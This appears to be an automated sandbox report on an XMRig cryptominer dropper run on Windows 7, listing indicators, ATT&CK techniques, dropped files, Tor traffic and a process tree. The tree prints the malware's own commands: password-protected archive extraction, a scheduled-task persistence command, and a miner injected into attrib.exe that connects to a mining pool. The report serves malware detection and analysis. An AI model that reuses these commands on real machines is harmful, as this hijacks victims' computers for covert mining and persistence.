xmrig | b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/11/2024, 01:30 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
Size

15.9MB
MD5

90a722e0917f225f5a69f2ebf731eef0
SHA1

da735c429ce7c5db1f994625e22b6e7f10b9b171
SHA256

b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89
SHA512

fd9b7ccae986fde90200b112478b8fe703eab77709922c9cb8664dc8685a143f1914e227785ea8d68eedb76e26522fb5e33f11dcd0462954ac4d7e63625a9d47
SSDEEP

393216:v7eZsZjpfIWLWYyIiJOmhmP0nUzStz4GH7IYyvJ:DecT2hhmssGH8xh

Score

10^/10

xmrig discovery miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/1648-3145-0x00000000000E0000-0x0000000000BF1000-memory.dmp	xmrig
behavioral1/memory/1648-3147-0x00000000000E0000-0x0000000000BF1000-memory.dmp	xmrig

Executes dropped EXE 7 IoCs

pid	Process
3000	CL_Debug_Log.txt
1104	Helper.exe
848	Helper.exe
1348	Helper.exe
1840	Helper.exe
1176	tor.exe
1948	Helper.exe

Loads dropped DLL 13 IoCs

pid	Process
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
560	taskeng.exe
560	taskeng.exe
1720	Process not Found
1348	Helper.exe
1348	Helper.exe
1176	tor.exe
1176	tor.exe
1176	tor.exe
1176	tor.exe
1176	tor.exe
1176	tor.exe
2020	Process not Found

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000016d24-26.dat	autoit_exe
behavioral1/files/0x0008000000016d13-29.dat	autoit_exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1348 set thread context of 1840	1348	Helper.exe	40
PID 1348 set thread context of 1948	1348	Helper.exe	44
PID 1348 set thread context of 1648	1348	Helper.exe	46

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CL_Debug_Log.txt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\VORHPBAB\root\CIMV2	Helper.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2784	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	3000	CL_Debug_Log.txt
Token: 35	3000	CL_Debug_Log.txt
Token: SeSecurityPrivilege	3000	CL_Debug_Log.txt
Token: SeSecurityPrivilege	3000	CL_Debug_Log.txt
Token: SeRestorePrivilege	1840	Helper.exe
Token: 35	1840	Helper.exe
Token: SeSecurityPrivilege	1840	Helper.exe
Token: SeSecurityPrivilege	1840	Helper.exe
Token: SeRestorePrivilege	1948	Helper.exe
Token: 35	1948	Helper.exe
Token: SeSecurityPrivilege	1948	Helper.exe
Token: SeSecurityPrivilege	1948	Helper.exe
Token: SeLockMemoryPrivilege	1648	attrib.exe
Token: SeLockMemoryPrivilege	1648	attrib.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
1104	Helper.exe
1104	Helper.exe
1104	Helper.exe
848	Helper.exe
848	Helper.exe
848	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe
1648	attrib.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
1104	Helper.exe
1104	Helper.exe
1104	Helper.exe
848	Helper.exe
848	Helper.exe
848	Helper.exe
1348	Helper.exe
1348	Helper.exe
1348	Helper.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2516 wrote to memory of 3000	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	30
PID 2516 wrote to memory of 3000	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	30
PID 2516 wrote to memory of 3000	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	30
PID 2516 wrote to memory of 3000	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	30
PID 2516 wrote to memory of 2716	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	32
PID 2516 wrote to memory of 2716	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	32
PID 2516 wrote to memory of 2716	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	32
PID 2516 wrote to memory of 2716	2516	b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe	32
PID 2716 wrote to memory of 2784	2716	cmd.exe	34
PID 2716 wrote to memory of 2784	2716	cmd.exe	34
PID 2716 wrote to memory of 2784	2716	cmd.exe	34
PID 2716 wrote to memory of 2784	2716	cmd.exe	34
PID 560 wrote to memory of 848	560	taskeng.exe	37
PID 560 wrote to memory of 848	560	taskeng.exe	37
PID 560 wrote to memory of 848	560	taskeng.exe	37
PID 560 wrote to memory of 1104	560	taskeng.exe	38
PID 560 wrote to memory of 1104	560	taskeng.exe	38
PID 560 wrote to memory of 1104	560	taskeng.exe	38
PID 1104 wrote to memory of 1348	1104	Helper.exe	39
PID 1104 wrote to memory of 1348	1104	Helper.exe	39
PID 1104 wrote to memory of 1348	1104	Helper.exe	39
PID 1348 wrote to memory of 1840	1348	Helper.exe	40
PID 1348 wrote to memory of 1840	1348	Helper.exe	40
PID 1348 wrote to memory of 1840	1348	Helper.exe	40
PID 1348 wrote to memory of 1840	1348	Helper.exe	40
PID 1348 wrote to memory of 1840	1348	Helper.exe	40
PID 1348 wrote to memory of 1176	1348	Helper.exe	42
PID 1348 wrote to memory of 1176	1348	Helper.exe	42
PID 1348 wrote to memory of 1176	1348	Helper.exe	42
PID 1348 wrote to memory of 1948	1348	Helper.exe	44
PID 1348 wrote to memory of 1948	1348	Helper.exe	44
PID 1348 wrote to memory of 1948	1348	Helper.exe	44
PID 1348 wrote to memory of 1948	1348	Helper.exe	44
PID 1348 wrote to memory of 1948	1348	Helper.exe	44
PID 1348 wrote to memory of 1648	1348	Helper.exe	46
PID 1348 wrote to memory of 1648	1348	Helper.exe	46
PID 1348 wrote to memory of 1648	1348	Helper.exe	46
PID 1348 wrote to memory of 1648	1348	Helper.exe	46
PID 1348 wrote to memory of 1648	1348	Helper.exe	46
PID 560 wrote to memory of 2888	560	taskeng.exe	48
PID 560 wrote to memory of 2888	560	taskeng.exe	48
PID 560 wrote to memory of 2888	560	taskeng.exe	48

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1648	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe
"C:\Users\Admin\AppData\Local\Temp\b45a61a91554efc9b2a6246b220a38a6bcf82baa721e237b784f106f04709e89.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2516
- C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
  C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2784

C:\Windows\system32\taskeng.exe
taskeng.exe {50AEC677-7860-4E0C-AD67-F459827B0E6E} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:560
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:848
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck8963
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1840
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1176
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1948
  - - C:\Windows\System32\attrib.exe
      -o stratum+tcp://pool.hashvault.pro:8888 -u https://monero.hashvault.pro/ru/dashboard/49uYxNevVbd9RXWVXw7TQFY8VEq3JWwuMSYosYBHkY3Zij1zkLUT3UFBxCh8HAkkM52rnBwTYJ1Bh66tpxkNnPFc7HEYZUD -p x -t 8
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Views/modifies file attributes
      PID:1648
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2888
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:584

Network

DNS

pool.hashvault.pro

attrib.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

95.179.241.203

pool.hashvault.pro

IN A

45.76.89.70

185.100.86.128:9001

tor.exe

152 B
3
5.45.111.149:443

www.zvxx65.com

tls

tor.exe

39.6kB
789.0kB
309
579
127.0.0.1:49274

tor.exe
127.0.0.1:9303

Helper.exe
185.141.57.4:6698

www.64czre5cm.com

tls

tor.exe

473.9kB
5.6MB
2431
4199
46.38.243.62:9001

www.2gz7j3v2znxyrw73fbpoq3z.com

tls

tor.exe

634.0kB
7.4MB
3239
5522
46.38.243.62:9001

www.dk27rqzye44uuy44g3qeqyf.com

tls

tor.exe

25.2kB
47.8kB
67
80
185.141.57.4:6698

www.dstw.com

tls

tor.exe

303.2kB
5.8MB
2367
4486
127.0.0.1:9303

Helper.exe
127.0.0.1:9303

Helper.exe
212.51.149.67:9001

www.zhq2ul2pc.com

tls

tor.exe

4.3kB
6.8kB
16
18
127.0.0.1:9303

Helper.exe
45.76.89.70:8888

pool.hashvault.pro

attrib.exe

882 B
1.2kB
5
4

8.8.8.8:53

pool.hashvault.pro

dns

attrib.exe

64 B
96 B
1
1

DNS Request

pool.hashvault.pro

DNS Response

95.179.241.203

45.76.89.70

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32.exe

Filesize
7.4MB

MD5
ceacffcdc85c7b50bda138dbbe86aa72

SHA1
fbbcd6ace55423225a305f03a272d8e88ab8d14f

SHA256
b18490edc5223107c88a89114421f5a88e872e1e5ed4bbcf6e328c4520db3ad9

SHA512
77d214d677dbbe75c7c9f9e30aa78594c6f788ff3e0339f895df145686d2b2e3052930d45be95769a41a157531e62d8b1fcc9f7e93042200eb1663eba3ab9b7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\64.exe

Filesize
8.4MB

MD5
aa577f407e98b583ea7d5446701d088a

SHA1
81da14d7d6e4098d6d0338208eaaf932afbffbb8

SHA256
8675dbe1e36d67441d9a4485f775a05459c60ae9fbd9f287d8e561e1beae9701

SHA512
5c710f6de63b9c6d587b46c4e4781390c4f7b38974c65406ecf12508828da5c2cdfc60ce37ea2282aa68c968008161b2c8a162d5465718aba39e882b272f9595

Download Submit
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt

Filesize
14.6MB

MD5
03486b9a3be16d866c596a47ed55c0ee

SHA1
7f39fea1aa90c8e9c09198a4e014fdac2d49c488

SHA256
bcc2756d52f687fa4b0c763f1c2ee4e65ed03bc2398851f85e4e7756f86757f4

SHA512
f9bb121324d8025b1e2738ad3b03f7220c4fc8624d66d2137e3d52f21d5cf9eab7be67503468b121eba5b42cf8d5c0e1fba2bce527db41e70b3be4ec3400805e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml

Filesize
2KB

MD5
9160347bec74471e1a79edfd950629ae

SHA1
c149a7e5aab6e349a70b7b458d0eaaa9d301c790

SHA256
0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

SHA512
b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

Download Submit
C:\Users\Admin\AppData\Local\Temp\asacpiex.dll

Filesize
14.6MB

MD5
10a7ed0a44fddc58b9a506ae9ad1cce1

SHA1
cdad883cd78af81560739ad5d38a3866a757d8a9

SHA256
2025fc05042c1533b3c1b7d16e5b9cb3117a5b2a5882bdfcbbc911e1b89a7199

SHA512
2a6fcfd6585d827ce60da22f3ed4a656207e2bb4db122e11e4704a224b8a30f46f382a11051bc796cf81138573b748c4e1628845e38b5bdf2c2fc419aba05f98

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
11KB

MD5
71181eb17f33bb5e6e4d9926943e49b9

SHA1
5e2b8833f083b3ea3aaadebe0c23b5cd08782757

SHA256
9c7c8a8ba30d78078454c5e974fb3cbe0e39b91f2827d09a48a15854c64c5d7e

SHA512
bfb8ee9385dd11698bfa76e55355dc7fa281885aa431c8767e4f6f8e2e11741f0bbfcd1a450b06dc7e88dc8f80cb9f1e3d06bcd17120d0dff292ce5ed2620cc8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
64KB

MD5
0a7eabd99f18ab88dcfd8f1fcb2432e7

SHA1
2b133783b7bc2d0bc18d44b73a0f474d44fbf87e

SHA256
1f768e49bd4fb542034c09034167bf90a02332f1b1cb2729c5136857afac5ba0

SHA512
02b1349ad07b5b2a0182e8995220d706e7cd311361d126ca448731f8b13520ebec004908a46f4607f7d5c337dd73a0b29d68112786f9be1a27235f3e487c89ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
2.6MB

MD5
21e3778b11e03ced442a1ac73d8949ee

SHA1
9e416a029a3c6e6738cba0d1f69253ca283b73ea

SHA256
03b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76

SHA512
20b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt

Filesize
15.8MB

MD5
7268eb05d51294219569569ea006da2a

SHA1
ade2c0a248f6aae9ff00f42e04dd3d1de242b289

SHA256
188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12

SHA512
0056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp

Filesize
2.5MB

MD5
54183220aa6c777f8228474ff5b5df01

SHA1
ed438f17bffb37d42afd61d8dcef0c50d554c65c

SHA256
9a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963

SHA512
70b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs

Filesize
20KB

MD5
05510f1b0214c9e4f528a873260a1ab6

SHA1
bf828d7326314a68f5c87d1d76a0ca125b460b83

SHA256
aac16a0e9dd97d559ec76f412312a4d567b20c008841b7707d4a63571fdde29e

SHA512
39a4fd5d3f007a2e476c37c038b202e87281518bccd2c6b93e55b7a45ef987b71df508d432487f6aef1fac67bcc44cee9b2c5427d3217a64ccd7775d37b92258

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmp

Filesize
2.7MB

MD5
f1d9e157b728fc4c2e6719483e8535c6

SHA1
771b2fadaa2a7eb0bbd1d909155160f1da75dccc

SHA256
1fdf3487679513979f556c4670a4915f9498027e0fa69d7ea91311f2074e4915

SHA512
404744faa8e0980c7873f5d52a3dd886270fb0412051914c16e2bb707a2c080124c3d47eecce21e4cfbc8eba424c06d95c2b38af53b685c9d24d4a2b52eef17b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
9.9MB

MD5
a64e95078d7ed4cc05569ab3d36484ec

SHA1
5f5b0b820ee3e804d38db970ef5c1dbe5f3cb34b

SHA256
03c642732bb63a93204fede246f217b05d89da19748824111676b2404ca93a4e

SHA512
cdb802a31aeeb646fc5a6dcbc4f17af3e12be1fe4f0efa601a7a90c2f197d9fad6a2ae157709dfd2cd5e6d426bae5f197acccfe73ecf97fec6110f216d295c9c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
20.1MB

MD5
95655d195e5da7273806770874c72cf1

SHA1
12800d879bcf3178358fe4b5229a7eb04c31b9fb

SHA256
c5d714b955601d28f307b507941faca6fcf6da457246c9d291450bd8d279d06a

SHA512
4f56b590f9eb6aa35cbf6e646384bab58379c230b4b269e31c70eb4c1a02cb7c2aaeaa7217c2f559691b34d0824958b10beffd1cdeb04f5dfaaf62caf6f5c82a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state

Filesize
3KB

MD5
8516c050858e73fbdcfaa2b028784337

SHA1
60198cb99f01fc4efd821bd19008d5033cb03811

SHA256
3cbaced385ca26a9b3b3a2315b19b1e3f74144db60c6d672dd2703a38ddc0d0d

SHA512
bca5f4500da5b440bd1330f4186f22a1338358cf3e6466d7edc9ea987cd156c9385231e3c8e86b10ae828f429ee8cde37d49ca9b6104068c4f9f09e0ccb2eb22

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid

Filesize
6B

MD5
4479f4d9e4e254ee5441d94b0bee871d

SHA1
769d2c2572bb29ac434d32fb10ac4287943208e8

SHA256
932078790930fcb03509d77409c0bb0249eb0878b2ab6ff921ae7189ccb0cd6f

SHA512
f88323aee7bb7c5119be9538456ed5f75bd8866bcd371522bff6fdfc50c41ab764d4a0237a5e9be3cb9b529f8ffb72e73a6cf108e4e19e4ab8afeb791a25ebcc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig

Filesize
201B

MD5
b9d2fe9cfa840518fa39039c928d4938

SHA1
0561516b7cfa784cf400349983817c8b18817256

SHA256
69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

SHA512
894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

Filesize
646KB

MD5
c1507e234ff7f11a259d87a57af740be

SHA1
7478ba561c9f478ede650561867ebd2db58da42f

SHA256
d6a7d46f6fc803b50460d03c0bc14f2f128ee2becabcf1713715bcebf13ee75b

SHA512
64d0657050028d846097429ad1268844038059279e1256329716b937338de5fc1b5f50f420b8aa781c5e2a19f15158f564569db639981fef10fa5e57dfd4717b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

Filesize
657KB

MD5
7cb2f0f4bba8d16c3200e9ac2a25b7c0

SHA1
63cf39682bf6876f563e1567df3c55fd5939e6ea

SHA256
ec52e90c68dd0e7603df3f9fe6c909d019a7e94dc3ce0efd8baf67864a43b74b

SHA512
7a660d87739914c68cadb56a4acbf27d68fd145b3bb65b957b4c767dfabe0762c40d58faa3a2df3b3453083ea658411c79d53be5166dda844782a9cd2617a264

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
ead6d4a87041e13b9041f78be1cb84d1

SHA1
896a336e08a1904537ee5a4a86eb0e885a18e17a

SHA256
b94b8981f8110944c5b03c9cba4066e9d0daa13687dead387bcbc772132c6d24

SHA512
34054ec79691145a8d511f9425f9ad44e07f8bfb38bd0b3251a5db3358c0055344615990fb770d4bdcbf04c9461847dfd4f6d2bac1e43ec815426a94d065c580

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
4.3MB

MD5
9f2d86da7d58a70b0003307d9cfc2438

SHA1
bd69ad6ea837e309232d7c4fd0e87e22c3266ac5

SHA256
7052619814a614a1b157c5c94a92dbec22b425a0977ac8b21958b8db81e2dd65

SHA512
ce345ff77d8043f416a04b782be8e7b0d5fdea933f3ac79abb88648a9fca23d7a69f537a825d0b636ba64f80afe70f758114ddbf412bd9398800ba4b6e359a99

Download Submit
\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
722KB

MD5
43141e85e7c36e31b52b22ab94d5e574

SHA1
cfd7079a9b268d84b856dc668edbb9ab9ef35312

SHA256
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

SHA512
9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
3.4MB

MD5
791a48e7cf84ec1532d20127556f6300

SHA1
774f71e595cfc7e24dc941839566bc9edd9156c5

SHA256
af682ad107cf0e9d9f11adeaf88f817610988b56577c4020897debc0f98e26ff

SHA512
ecbb4a07bb68fec5258be0adc91b89d179b5668bbab3be3bd72d5339f8bf3b32a1860b38693a304029fe989bd92adb020cf755f673b1e59966dfc75e4f958cfa

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
974KB

MD5
be51ba4bea2d731dacf974c43941e457

SHA1
51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

SHA256
98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

SHA512
6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
965KB

MD5
7847c7b13b3414e8e7652880b4609205

SHA1
930670acc16157f56aaf69423e5d7705441764ba

SHA256
38200438cf0c9c20d17e5b9030d2ad2e4a1b6b9dc41c287bc603dd50d22e67bb

SHA512
c3c81dc3eb546c40b3606338deadbd63331659645dd24b5fd0d4fb3170b053fef528ee3fe005c9446176a5c049e9412ea8193ad2f8b9a7301ff67b088f1bbb6e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
313KB

MD5
97d89dec5f6a236b6832a5f3f43ab625

SHA1
18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

SHA256
c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

SHA512
7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
608KB

MD5
624304f2ba253b33c265ff2738a10eb9

SHA1
5a337e49dd07f0b6f7fc6341755dc9a298e8b220

SHA256
